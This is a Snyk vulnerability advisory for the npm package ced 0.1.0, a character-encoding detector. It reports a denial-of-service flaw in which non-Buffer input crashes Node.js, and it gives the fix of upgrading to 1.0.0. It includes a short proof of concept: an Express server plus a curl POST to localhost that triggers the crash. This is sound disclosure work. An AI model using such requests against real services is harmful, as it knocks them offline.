Homepage
About Snyk

ced@0.1.0 vulnerabilities

Detect the character encoding using Google’s compact_enc_det library

Go back to all versions of this package
Report a new vulnerability Found a mistake?

Direct Vulnerabilities

Known vulnerabilities in the ced package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Denial of Service (DoS)

ced is a Detect the character encoding using Google’s compact_enc_det library

Affected versions of this package are vulnerable to Denial of Service (DoS). Passing data types other than Buffer causes the Node.js process to crash.

PoC

const express = require("express");
const bodyParser = require("body-parser");
const ced = require("ced");

const app = express();

app.use(bodyParser.raw());

app.post("/", (req, res) => {
  const encoding = ced(req.body);

  res.end(encoding);
});

app.listen(3000);

curl --request POST --header "Content-Type: text/plain" --data foo http://localhost:3000`

How to fix Denial of Service (DoS)?

Upgrade ced to version 1.0.0 or higher.

<1.0.0
Go back to all versions of this package